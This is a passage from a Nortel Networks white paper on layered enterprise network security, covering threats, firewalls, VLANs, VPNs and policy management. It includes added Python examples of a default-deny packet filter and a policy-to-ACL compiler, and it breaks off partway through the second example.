
White Paper

Nortel Networks

Unified Security Architecture
for enterprise network security
A conceptual, physical, and procedural framework
for high-performance, multi-level, multi-faceted security
to protect campus networks, data centers, branch networking,
remote access, and IP telephony services.

The greater the reach and availability of the network, the greater its vulnerability
to threats from within and outside the organization.

The new openness of networked communications introduces new ethical,
financial, and regulatory pressures to protect networks and enterprises from
internal and external threats and attacks.

Every IT security professional should be up-to-date on the Top Ten challenges to
enterprise security—and the latest recommendations to address those challenges.

Contents
Executive summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Part I. The Top Ten challenges to enterprise network security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Enterprise Security Challenge #1—The Internet was designed to share, not to protect . . . . . . . . . . . . . . . . . 4
Enterprise Security Challenge #2—Security is not optional. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5
Enterprise Security Challenge #3—The bad guys have good guns. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5
Enterprise Security Challenge #4—Security threats recognize no boundaries. . . . . . . . . . . . . . . . . . . . . . . . . .6
Enterprise Security Challenge #5—Security depends on people, process, and technology. . . . . . . . . . . . . . . . .6
Enterprise Security Challenge #6—It’s not enough to guard the front gate. . . . . . . . . . . . . . . . . . . . . . . . . . . .7
Enterprise Security Challenge #7—There’s no stock blueprint. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7
Enterprise Security Challenge #8—Frisking everybody and everything takes time. . . . . . . . . . . . . . . . . . . . . .9
Enterprise Security Challenge #9—Grace under fire is a requirement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .9
Enterprise Security Challenge #10—Security is a closed-loop process with an open-ended date. . . . . . . . . . . .9
Part II. The Nortel Networks Unified Security Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.1. Multi-layer security across application and network levels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .12
2.2. Variable-depth security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .13
2.3. Closed-loop policy management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14
2.4. Uniform access management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14
2.5. Secure network operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .15
2.6. Secure multimedia communications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .18
2.7. Network survivability under attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .19
2.8. The closed-loop policy management reference model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .19
2.9. A closer look at uniform access management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .21
Part III. Network security in the real world . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
3.1. Securing the campus network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .25
3.2. Securing the data center . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .28
3.3. Securing the remote office . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .31
3.4. Securing remote access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .35
3.5. Securing IP telephony services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .37
Part IV. Nortel Networks technology and expertise . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
4.1. Design tenets built into the Nortel Networks security portfolio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .42
4.2. Expanded choice through partnerships . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .43
4.3. Security services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44
4.4. Nortel Networks product assurance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44
4.5. Nortel Networks and cross-industry security developments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .45
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46

Appendix A. Hackers’ tools of the trade . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47

Appendix B. Application and network level threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49


Executive summary
Today’s connected enterprise faces a security paradox. The very openness and ubiquity that make the
Internet such a powerful business tool also make it a tremendous liability. The Internet was designed to
share, not to protect. The ports and portals that welcome remote sites, mobile users, customers, and
business partners into the trusted internal network also potentially welcome cyber-thieves, hackers, and
others who would misappropriate network resources for personal gain.

The only effective network security strategy is one that permeates the end-to-end architecture and enforces
corporate policies on multiple levels and multiple network points.

Nortel Networks, a global leader in secure data networking, offers proven solutions to satisfy end-to-end
network security requirements. “Security in the DNA” is a key tenet of our strategy for the new enterprise
network, a convergence framework we call “One Network. A World of Choice.”

This document presents the security component of that enterprise network strategy. The “Unified Security
Architecture” provides a conceptual, physical, and procedural framework of best recommendations and
solutions for enterprise network security. It serves as an important reference guide for IT professionals
responsible for designing and implementing secure networks.

What are the requirements and vulnerabilities? What technology options and implementation choices are
available? How do you protect the network at all levels? This comprehensive strategy addresses those
pressing concerns facing IT security specialists, and offers encouraging news about the depth and breadth
of options available for securing critical network resources.

The Unified Security Architecture is realistic.
It assumes that all components of an IT infrastructure are targets... that even internal users could be
network threats... attacks are inevitable... network performance cannot be compromised by
processing-intensive security measures... and IT budgets are constrained.

The Unified Security Architecture acknowledges the diversity of networked enterprises.
It is not a one-size-fits-all prescription, but rather a framework of functionality that offers multiple
implementation choices suitable for closed, extended, and open enterprises in different industries—
and for diverse application requirements within all enterprise types.

The Unified Security Architecture addresses the multi-level complexity of network threats.
It provides answers on multiple levels—for instance, from a firewall guardian to block intruders at the
front gate to encryption to shroud every packet in privacy... from virtual private networks that span
the global Internet to virtual LANs that segregate network management traffic from desktop users.

The Unified Security Architecture promotes a process, rather than an endpoint.
Effective security is not achieved through a one-time initiative. This architecture outlines measures
for strong ongoing policy management, reflecting both human and technical factors.

Read on for a discussion of the Top Ten challenges facing IT professionals today and how the
Nortel Networks Unified Security Architecture addresses the challenges.


Part I. The Top Ten challenges to enterprise network security

Every enterprise that relies on network-connected applications and services is subject to 10 key security realities:

1. The Internet was designed to share, not to protect.
2. Security is not optional.
3. The bad guys have good guns.
4. Security threats recognize no boundaries.
5. Security depends on people, process, and technology.
6. It’s not enough to guard the front gate.
7. There’s no stock blueprint.
8. Frisking everybody and everything takes time.
9. Grace under fire is a requirement.
10. Security is a closed-loop process with an open-ended date.

Let’s take a closer look at these challenges—and what IT security professionals can do about them.

Enterprise Security Challenge #1
The Internet was designed to share, not to protect.
In six or seven short years, the Internet has evolved from an adjunct contact channel into the backbone of many critical
business applications. Enterprises are leveraging their IP-based intranets and the world-wide Internet to bring remote offices,
mobile workers, and business partners into their trusted network environments. Many enterprises are capitalizing on the
growing reach and reliability of IP data networks to completely redefine the way they deliver and manage approved corporate
applications.

The Internet enables them to interact more effectively with customers, streamline operations, reduce operating costs, and
increase revenues. However, the Internet was designed to share, not to protect. The ports and portals that welcome outside
users into the trusted internal network also potentially open the door to serious threats. The level of threat only increases as
legacy applications become network-enabled and as network managers open their networks to more new users and
applications.

How do you manage mission-critical communications on an inherently insecure medium? Managing that flow is somewhat
like guarding a revolving door. You can’t lock it unless you also close out the traffic you do want.

Remote access services that enable traveling employees to dial in for e-mail access... remote offices connected via dial-up lines...
intranets, and extranets that connect outside parties to the enterprise network... all these business-enabling communications
increase the vulnerability of the network.
Enterprise Security Challenge #2
Security is not optional.
Security breaches and unlawful access to confidential data can cost enterprises millions, but the requirement for network
security goes beyond financial incentives. The governments of many countries are forcing enterprises to comply with regulations
governing network security and privacy.

In the U.S., the Federal government regulates the privacy and security of electronic information with such regulations as the
Health Insurance Portability and Accountability Act (HIPAA), the Gramm-Leach-Bliley Act, the Safe Harbor Act, the USA
Patriot Act, and the Children’s Internet Protection Act (CIPA). More are coming.

Similar regulations are being enacted in Europe and elsewhere, such as the Data Protection Act and Computer Misuse Act in
the U.K. Failure to comply with these regulations brings civil and criminal penalties, even prison terms.

Even if governmental regulations weren’t an issue, organizations that suffer security breaches may be sued by customers and
damaged by negative publicity. All enterprises that leverage the Internet for remote access have an obligation to protect network
integrity and data confidentiality—for their own sakes as well as for their customers and business partners.

Enterprise Security Challenge #3
The bad guys have good guns.
Attackers have a broad repertoire of tools and techniques they can use to compromise a network. With these tools of the trade,
they can launch multi-level attacks to access the network—creating an access hole to intrude upon the network, and then using
secondary attacks to exploit other parts of the network.

For example, attackers can take advantage of weak user authentication and authorization tools, improper allocation of hidden
space, shared privileges among applications, or even sloppy employee habits to gain unauthorized access to network resources.

They can disable a trusted host and assume its identity, a threat known as IP spoofing or session hijacking.

Using sophisticated new network sniffers that can decode data from packets across all layers of the OSI model, hackers can
steal user names and passwords, and use that information to launch deeper attacks.

Denial of Service (DoS) attacks flood a network with illegitimate requests and thereby prevent legitimate users from accessing
their service.

In bucket brigade attacks, also known as “man-in-the-middle” assaults, the attacker intercepts messages in a public key
exchange between a server and a client, retransmits the messages substituting their public key, and in the process tricks the
original entities/users into thinking they are communicating with each other.

Back door entries to access network resources can be accidentally or intentionally opened by users and procedural oversights.

Masquerading enables a hacker to pose as a valid administrator or engineer to access the network, often to elevate user privileges.

For more information about these types of attacks, see Appendix A, “Hackers’ Tools of the Trade.”

Enterprise Security Challenge #4
Security threats recognize no boundaries.
The typical enterprise “internal” trusted network is anything but internal these days. It extends to include supply chain
partners, telecommuters, remote access users, Web users, application service providers, disaster recovery providers, and more.
Unfortunately, that means that the network also reaches hackers, cyber-thieves, disgruntled employees, and others who would
misappropriate network resources for personal gain.

In today’s business environment, the concept of a network perimeter is disappearing. Boundaries between inside and outside
networks are becoming thinner, almost irrelevant. Applications run on top of networks in a layered fashion.

The OSI (Open Systems Interconnection) model was built to allow different layers to work without knowledge of each other.
Unfortunately, that means that if one layer is hacked, communications are compromised without the other layers being aware
of the attack. That means security must address unique considerations at application and network layers—and bridge these
layers to ward off multi-level threats.

Application-layer attacks exploit vulnerabilities in the operating system and applications to gain access to resources.
Application-layer attacks can be based on viruses, worms, buffer overflow, and password harvesting, among others. Web
services and single sign-on technologies aggravate the problem, since they encourage Web-enabling legacy-based applications that
were not designed with Web connectivity and security issues in mind.

Network-layer threats expose the network infrastructure to sabotage, vandalism, bad system configuration, denial of service
(DoS), snooping, industrial espionage, and theft of service. Attacks may be launched from inside the network by insiders and
also from external sources such as hackers.

For more information about application-layer and network-layer threats, see “Appendix B: Application and network level threats.”

Enterprise Security Challenge #5
Security depends on people, process, and technology.
Vulnerabilities arise from people failures (such as posting passwords in public view), process failures (such as slack policy
enforcement), and technical aspects (such as rogue programs and Trojan horses)—and combinations of all three.

The Nimda virus that recently caused havoc in IT environments is a perfect example. At first glance, Nimda was technical in
nature: a virus. But on closer inspection, the havoc was caused more by human error than technical devilry. Nimda exploited
six previous technical vulnerabilities; it was just a variant of previous vulnerabilities that were documented and communicated
many months before Nimda actually spread on the Internet.

Organizations should all have known about these vulnerabilities and disseminated that knowledge to the people responsible for
protecting IT systems. Nimda was a non-issue for enterprises that had established processes in place for translating knowledge
into action tasks, assigning responsibility for those tasks, and auditing successful completion.

Enterprise Security Challenge #6
It’s not enough to guard the front gate.
Every component of the IT infrastructure is susceptible to attacks, not just obvious gateways to the Internet. Hosts, applications
such as IP telephony, routers, and switches can be attacked by hackers or unauthorized users from inside or outside the enterprise.
At the network level, the use of firewalls, proxy servers, and user-to-session filtering can add protection, but hackers seem to get
smarter all the time. Using user access control at the network and application level with appropriate authentication and
authorization can minimize the risks of unauthorized access.

But the sheer diversity of the types of attacks—and the multi-level nature of many attacks—requires that IT managers understand
how security breaches are instigated and be able to assess and recover from any inflicted damage. That means the only effective
network security strategy is one that permeates the end-to-end architecture and enforces corporate policies on multiple levels—user,
application, and network—and at multiple network points.

Enterprise Security Challenge #7
There’s no stock blueprint.
Each enterprise has a unique set of business needs and has evolved their networking environment accordingly. That means the
“right” security strategy is more a prescription of functionality and characteristics than a stock blueprint. Security is not a ‘one size
fits all’ situation. Neither is it a static implementation, any more than the network or technology remains static.

For general purposes, we can categorize enterprises into three types of security spheres:

The “closed enterprise” uses logical (e.g. frame relay) or physical private lines between sites, with PC dial access provided
selectively for employees needing access into the Internet. Web presence is achieved through an Internet data center provided by a
service provider (who is responsible for establishing a secure environment). The organization also provides conventional dial access
for remote employees (e.g. working from a hotel). The company uses private e-mail among employees with no external access.
Wireless LANs are also starting to be used.

Even the closed enterprise has security concerns, not just from disgruntled internal users, but also because there are a number of
‘backdoor’ exposures. Users with dial access to the Internet from their desktop PCs, employees surfing the ‘Net from laptops they
use at home or on the road, and wireless LANs all introduce Internet-related threats. Perhaps, the greatest risk comes from the
specious belief that the closed enterprise is immune to external risks.

The “extended enterprise” is an extension of the ‘closed’ enterprise. Web presence is still achieved via a service provider. Support
for remote employee and office access over IP virtual private networks (VPNs) over the Internet is provided, delivering higher
speed, lower cost connectivity. The enterprise provides general-purpose access for all employees into the Internet, allowing them to
leverage the abundance of business-related information available on the Internet. Inter-working between the internal e-mail system
and the rest of world is provided.

The “open enterprise” leverages the Internet by allowing partners, suppliers, and customers to have access to an enterprise-
managed Internet Data Center, even allowing selective access to internal databases and applications (e.g. as part of a supply chain
management system). Internal and external users access the enterprise network from home, remote offices, or other networks using
wired or mobile devices.

For the extended enterprise, the diversity of supported services and access mechanisms translates into multiple paths into the
enterprise network, and in turn increases the risk. Naturally, that risk increases exponentially with the open enterprise, which
has the greatest susceptibility to application-layer and network-layer threats, unauthorized access, and eavesdropping.
Infrastructure, applications, and network management systems are equally vulnerable.

Figure 1. Generic Enterprise types

Closed enterprise (ASP Data Center; Customers; Employees; Internet; Enterprise network)
• Dedicated WAN
• PC dial-in access
• PC Internet dial-out
• Outsourced Web site
• Private e-mail

Extended enterprise (Employees; Internet; Enterprise network)
• Internet Data Center
• Remote access and office IP-VPNs
• Employee Internet access
• Interworked e-mail

Open enterprise (Customers/partners/employees; Internet; Enterprise network)
• Controlled partner and select customer access
• Connectivity boundaries lowered
Enterprise Security Challenge #8
Frisking everybody and everything takes time.
Anyone who has traveled by airplane knows that the trade-off for enhanced security is delay. The more closely you inspect bags
and travelers, the longer the lines at security.

On enterprise networks as well, turning up the full complement of security features can slow Web servers to a crawl as they bog
down with processing-intensive encryption, decryption, key management, and more. Bolting IP-VPN capabilities onto legacy
routers brings its own brand of performance penalty. Voice applications, such as live Webcasts and Voice over IP, are very
sensitive to delay and jitter and are therefore dramatically affected by traditional security mechanisms.

Enterprise Security Challenge #9
Grace under fire is a requirement.
In the context of security, “reliability” and “survivability” have somewhat different meanings. Network reliability ensures that
the network continues to operate in spite of incidental failure of software and/or hardware components. Network survivability
means the network continues to operate—delivering essential services in a timely manner—while battling security threats, even
if parts of the network are unreachable or disabled due to overt attack.

Enterprise Security Challenge #10
Security is a closed-loop process with an open-ended date.
Organizations must view security as a steady process and evolving way of thinking about how to protect systems, networks,
applications, and resources. Reduce risk by continually and steadily making progress in identifying and addressing
vulnerabilities and security policy holes. Corporations and government institutions must be able to determine what is at stake when
security measures fail, how to detect security breaches, and what to do about them.

This process also entails continual training and awareness, since breaches of security policy are usually caused by human error
or carelessness. Employees, managers, and administrators must all be aware of established security policies and best practices.

The good news is that enterprise networks can minimize their risks from unauthorized users without sacrificing performance
for legitimate users. Part II of this document shows how the Nortel Networks Unified Security Architecture addresses these
Top Ten challenges.

Figure 2. Enterprises need a security framework to optimally use IT techniques, tools, and methodologies against attackers

Possible attacks:
• Authorization threats
• IP spoofing
• Network sniffers
• Denial of service
• Intrusion
• Bucket brigade attacks
• Back door traps
• Data modification
• Masquerading
• Infrastructure

Protected enterprise network:
• Anti-virus software
• Deep packet filtering
• Digital certificate
• IPsec and SSL encryption
• Firewalls
• Network and host-based Intrusion Detection Systems (IDS)
Part II. The Nortel Networks Unified Security Architecture

What can security IT professionals do about the Top Ten challenges?
The Nortel Networks Unified Security Architecture defines a conceptual, physical, and procedural framework of best
recommendations for end-to-end enterprise network security—addressing all the Top Ten challenges:
• The Internet was designed to share, not to protect.
So the Unified Security Architecture defines virtual private networks, virtual LANs, firewalls, encryption, and other
mechanisms that enable enterprises to reduce the risk of being Internet-connected.
• Security is not optional.
The Unified Security Architecture upgrades enterprise security programs and infrastructures to comply with business,
ethical, and regulatory mandates to protect data integrity and confidentiality.
• The bad guys have good guns.
The Unified Security Architecture identifies the various tools of the trade, how they operate, and what kinds of
protections thwart these attacks.
• Security threats recognize no boundaries.
The Unified Security Architecture addresses threats on multiple functional and architectural layers, enabling enterprises
to flexibly define what needs to be protected, from what kinds of threats, implemented how, and at what layers.
• Security depends on people, process, and technology.
The Unified Security Architecture calls for developing and enforcing security policies that address technical
considerations and human aspects of security, such as staff training and process.
• It’s not enough to guard the front gate.
The Unified Security Architecture begins with perimeter firewall defense and documents security provisions all the way
to the individual user and application.
• There’s no stock blueprint.
The Unified Security Architecture defines the required functionality and offers enterprises broad choice in which
functions to implement, to what degree, using what platforms and protocols.
• Frisking everybody and everything takes time.
The Unified Security Architecture introduces purpose-built security products that use load-balancing, health-checking,
and innovative acceleration technologies to minimize latency.
• Grace under fire is a requirement.
The Unified Security Architecture defines ways to segregate critical resources and sustain performance even under attack.
• Security is a closed-loop process with an open-ended date.
The Unified Security Architecture calls for policy management to be a process of continuous feedback and
improvement, reflecting the latest industry knowledge and best practices.

The comprehensive security strategy set forth in this document is based on seven key principles:
1. Multi-layer security that defines security protection functions at application, network-assisted, and network security
levels—in a layered architecture that can be flexibly defined and implemented.
2. Variable-depth security across the enterprise—not just at the edge of the Internet—for example, from firewall
perimeter defense, to VPNs to protect Internet-traversing traffic, and to VLANs to segregate traffic within a network.
3. Closed-loop policy management, including configuration of edge devices, enforcement of policies in the network,
and verification of network functionality as seen by the end user application.
4. Uniform access management, including stringent authentication and roles-based authorization of access to all
resources for all users, with granular access policies defined at the application level and managed enterprise-wide.
5. Secure network operations, by physically or logically partitioning network management from user traffic, and
applying other recommended security mechanisms to operational activities.
6. Secure multimedia communications, protected by encrypting the data, voice, and video payload without introducing
delays that this real-time traffic cannot tolerate.
7. Survival under attack, for instance, by using resilient architectures with no single point of failure, and applying
intrusion-detection systems, anti-virus software, content filtering, and ongoing vigilance as attackers continue adopting
new weaponry.

Figure 3. Principles behind Nortel Networks Unified Security Architecture

• Layered security
• Variable-depth security
• Closed-loop policy management
• Uniform access management
• Securing network operations
• Securing multimedia communications
• Survivability under attack
The principles underpinning the Unified Security Architecture offer enterprises a security blueprint to use as they move
towards increasingly open environments. Let’s take a look at each of the seven key principles of the Unified Security
Architecture.

2.1. Multi-layer security across application and network levels

Recognizing the multi-layered, interdependent nature of enterprise networks—and the critical need for security at more than
the application level—the Nortel Networks Unified Security Architecture logically organizes security into multiple levels:

• The Network Security Layer provides security functions at OSI layers 1 to 3 (physical, link, and data levels).
• The Network-Assisted Security Layer provides security functions at OSI layers 4 to 7 (network to application/
presentation layers) on top of the network level for added security.
• The Application Security Layer provides security in layer 7 of the OSI model, the application layer, and includes all
security built into server and storage platforms.
Some functions, such as access lists and VLANs, operate purely at the Network Security Level. Others, such as firewalls,
operate at either the Network or Network-Assisted Security Levels, depending on whether they are stateful or not. Others such
as SSL (Secure Sockets Layer) can be viewed as network-assisted or application security. The power of the Unified Security
Architecture is that industry-defined security functions are leveraged in a structured fashion, tightening security overall.

See Part III, “Security in the Real World,” for examples of these security layers in action for protecting campus and branch
networks, data centers, IP telephony services, and remote access.

Hardening server operating systems


Within the application level of the multi-layer security framework, a key element is “hardening” the multiple
operating systems used in network and user applications, such as OSs for data communications devices, servers,
network management systems, IP telephony servers, and more.

In an increasingly open, multivendor IT environment, network elements are frequently based on commercially available
OSs. For example, Nortel Networks CallPilot unified messaging system, Symposium Contact Centers, and
Business Communications Manager use a hardened version of Windows NT with off-the-shelf security software for
functions such as anti-virus protection, intrusion-detection, and login audits. Nortel Networks Succession CSE 1000
and Meridian IP-enabled PBX portfolios are built on an embedded real-time OS called VxWorks. The Nortel
Networks Succession CSE MX system is built on UNIX.

Procedures for hardening the OSs in Nortel Networks products are provided in our documentation. For third-party
operating systems where no specific hardening guide exists, consult the OS vendor for the latest OS hardening patches
and procedures.

Figure 4. Unified Security Architecture [figure: three stacked layers, Application Security over Network-Assisted Security over
Network Security; cross-cutting elements Policy Management, Network Mgmt. Security, and Secure Access Mgmt.; user
populations served: end users, operators, partners, and customers]
The remaining elements of the architecture—discussed in the sections to follow—are inter-related and somewhat orthogonal to
these layers. The table below illustrates how common security technologies map to the elements of Nortel Networks Unified
Security Architecture.

Figure 5. Security functionality mapping to the Unified Security Architecture

Code    Security functionality                Network     Network-assisted    Application
                                              Security    Security            Security
L2      Layer 2 VPN, EAP, and port security   Yes
NAT     Network Address Translation           Yes
AL      Access control list                   Yes
IPsec   IPsec encryption                      Yes
SRT     Secure dynamic routing                Yes
FW      Firewalling                           Yes         Yes
IDS     Intrusion detection                               Yes                 Yes
SSL     SSL encryption                                    Yes                 Yes
CF      Content filtering                                 Yes                 Yes
VS      Virus scanning                                    Yes                 Yes

Policy management functionality
• Policy Repository
• Policy Decision Point
• Policy Enforcement Point

Secure access management functionality (Auth)
• Authentication client
• Authentication server
• Authentication database

Network management security functionality
• Secure activity logs
• Network operator authentication
• Access control/operator authorization
• Encryption
• Secure remote access
• Firewalls
• Intrusion detection
• OS hardening
• Virus free software

2.2. Variable-depth security

Defining security policy at multiple network levels produces a security strategy where each security level builds upon the
capabilities of the layer below and provides finer grained security the closer you get to resources.

VLANs (Virtual LANs) provide basic network compartmentalization and segmentation, enabling business functions to
be segregated in their own private local area networks, with cross-traffic from other VLAN segments strictly controlled
or prohibited. The use of VLAN “tags” enables the segregation of traffic into specific groups such as Finance, HR, and
Engineering, separating their data without leakage between disparate functions.

Perimeter and distributed firewall-filtering capabilities provide another level of protection at strategic points within the
network. Firewalls enable the network to be further segmented into smaller areas, and enable secure connections to the public
network. Firewalls limit access to inbound and outbound traffic to the protocols and authentication methods that are explicitly
configured in the firewall. Firewalls that support Network Address Translation (NAT) enable optimization of IP addressing
within the network as specified in RFC 1918 (Address Allocation for Private Internets).

Firewalls provide an extra layer of access control that can be customized based on business needs. Distributed firewalls add the
benefit of scalability. Personal firewalls can be deployed on end-users’ systems to protect application integrity.

Virtual private networks (VPNs) provide an even finer granularity of user access control and personalization—enabling
secure access at the individual user level from remote sites and business partners, without requiring dedicated pipes.

Dynamic routing over secure tunnels across the Internet provides a highly secure, reliable and scalable solution. VPNs, VLANs,
and firewalls together allow the network administrator to limit access by a user or user group based on strictly defined policy
criteria and business needs. VPNs provide strong assurance of data integrity and confidentiality with strong encryption.

VLANs alone may satisfy the security needs of the “closed” enterprise. “Extended” and “open” enterprises will likely require a
combination of security level capabilities.
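
The layered controls described in this section can be made concrete with a small model. The block below is an added example, not Nortel code or a product configuration: it implements a stateless packet filter in which only explicitly configured protocol and port combinations pass (anything unmatched is denied), and it flags RFC 1918 source addresses that must be translated before leaving the enterprise. The rule and packet field names, the Finance VLAN and payroll server addresses, and the sample rules are constructed for illustration.

```python
"""Stateless firewall-filter model: traffic is permitted only when a rule explicitly
allows it, and RFC 1918 sources bound outside private space are flagged for NAT.
Added example; rule and packet field names are assumptions, not a product format."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

# The three private blocks defined by RFC 1918 (Address Allocation for Private Internets)
RFC1918 = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_private(addr: str) -> bool:
    """True if addr falls inside one of the RFC 1918 private ranges."""
    a = ip_address(addr)
    return any(a in net for net in RFC1918)


@dataclass(frozen=True)
class Rule:
    src: str              # source CIDR block
    dst: str              # destination CIDR block
    proto: str            # "tcp", "udp" or "icmp"
    dport: Optional[int]  # destination port; None matches any (used for icmp)
    action: str           # "allow" or "deny"


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str
    dport: Optional[int]


def matches(rule: Rule, pkt: Packet) -> bool:
    return (ip_address(pkt.src) in ip_network(rule.src)
            and ip_address(pkt.dst) in ip_network(rule.dst)
            and rule.proto == pkt.proto
            and (rule.dport is None or rule.dport == pkt.dport))


def evaluate(rules: List[Rule], pkt: Packet) -> str:
    """First-match evaluation. Anything not explicitly allowed is denied, which is
    the 'only what is explicitly configured' behaviour the text describes."""
    for rule in rules:
        if matches(rule, pkt):
            return rule.action
    return "deny"


def needs_nat(pkt: Packet) -> bool:
    """A packet from a private address bound for a non-private destination must be
    translated at the perimeter, since RFC 1918 space is not routable on the Internet."""
    return is_private(pkt.src) and not is_private(pkt.dst)


# Constructed sample policy: the Finance VLAN (10.1.0.0/24) may reach the payroll
# server over HTTPS and the Internet over HTTP; nothing else is allowed.
FINANCE_RULES = [
    Rule("10.1.0.0/24", "10.2.0.10/32", "tcp", 443, "allow"),
    Rule("10.1.0.0/24", "10.2.0.0/24", "icmp", None, "deny"),   # no ping sweeps of the server VLAN
    Rule("10.1.0.0/24", "0.0.0.0/0", "tcp", 80, "allow"),
]

if __name__ == "__main__":
    for pkt in (Packet("10.1.0.5", "10.2.0.10", "tcp", 443),
                Packet("10.1.0.5", "10.2.0.10", "tcp", 22),
                Packet("10.1.0.5", "203.0.113.9", "tcp", 80)):
        print(pkt, evaluate(FINANCE_RULES, pkt), "nat" if needs_nat(pkt) else "no-nat")
```

The evaluator deliberately has no "allow everything else" rule: the closing default deny is what turns a firewall from a list of blocked services into the access-control layer the section describes. A stateful firewall would additionally track connections so that return traffic is admitted without a separate inbound rule; this model is the stateless, network-level case.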

2.3. Closed-loop policy management

A properly designed and implemented security policy is an absolute requirement for all types of enterprises and has to be
owned by one group. It should be a living document and process, which is enforced, implemented, and updated to reflect the
latest changes in the enterprise infrastructure and service requirements.

The security policy must clearly identify the resources in the enterprise that are at risk and the resulting threat mitigation
methodologies. It should define which users or classes of users have access to which resources. The policy must define the use of audit
trails to help identify and discover violations and the appropriate responses.

Users think of the network in terms of people, applications, locations, time of day, etc.—not in technical terms such as
“firewall stateful inspection” or “access lists.” Security policies should use non-technical vocabulary to the extent possible for
user-facing issues, automatically translated by the policy management system into technical security mechanisms for network
implementation.

Policy management addresses the full realm of security components—firewalls, intrusion-detection systems, access lists and
filters, authentication techniques, and more—along with a system-wide view of network environments, such as data center,
remote office, and campus networks.

Ultimately, policy operates at a granular level to address pieces of the solution while providing centralized control and
accountability. Centralization ensures that security parameters are set consistently across multiple nodes, and that multiple policies
for different administrative domains all reflect enterprise-wide policy and inter-domain consistency.

Closed-loop policy management is implemented using the reference architecture described in 2.8, and includes configuration
management of network devices, enforcement of policies in the network, and verification of network functionality via audit
trails. Verification and audit trails close the loop on policy management, and result in updates to the policy to reflect corrective
actions.
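
The two ideas in this section, policy written in business vocabulary that is translated into technical mechanisms, and audit trails that close the loop, can be shown together in a small program. The block below is an added example and not Nortel's policy management software: a constructed directory maps groups to subnets, applications to servers and ports, and named time windows to hours; business rules are compiled into ACL entries; and a constructed audit trail is checked against the compiled policy so that any mismatch between what the network did and what policy requires is surfaced for corrective action. The rule fields and the rendered ACL syntax are this example's own.

```python
"""Closed-loop policy management, modelled: business-vocabulary rules are compiled into
technical ACL entries, and audit-trail records are checked against them so that
enforcement drift feeds back into a policy update. Added example; the directory tables,
rule fields and rendered ACL syntax are assumptions, not a Nortel format."""
from ipaddress import ip_address, ip_network
from typing import Dict, List

# Constructed directory: the vocabulary users think in, mapped to network objects.
GROUPS = {"Finance": "10.1.0.0/24", "Engineering": "10.3.0.0/24"}        # group -> VLAN subnet
APPS = {"Payroll": ("10.2.0.10", "tcp", 443),                            # app -> (server, proto, port)
        "SourceRepo": ("10.2.0.20", "tcp", 22)}
# Time windows as zero-padded "HH:MM" strings, so plain string comparison orders them.
WINDOWS = {"business hours": ("08:00", "18:00"), "always": ("00:00", "23:59")}

# Policy as a non-technical reader would write it.
BUSINESS_POLICY = [
    {"who": "Finance", "what": "Payroll", "when": "business hours", "action": "permit"},
    {"who": "Engineering", "what": "SourceRepo", "when": "always", "action": "permit"},
]


def compile_policy(policy: List[Dict]) -> List[Dict]:
    """Translate each business rule into a technical entry (subnet, host, proto, port, window)."""
    acl = []
    for rule in policy:
        host, proto, port = APPS[rule["what"]]
        start, end = WINDOWS[rule["when"]]
        acl.append({"src": GROUPS[rule["who"]], "dst": host, "proto": proto, "dport": port,
                    "start": start, "end": end, "action": rule["action"]})
    return acl


def render_acl(acl: List[Dict]) -> List[str]:
    """Render entries as vendor-neutral text, closing with a default deny."""
    lines = [f"{e['action']} {e['proto']} {e['src']} -> {e['dst']}/32 port {e['dport']} "
             f"time {e['start']}-{e['end']}" for e in acl]
    lines.append("deny ip any -> any")
    return lines


def expected_verdict(acl: List[Dict], src: str, dst: str, proto: str, dport: int, at: str) -> str:
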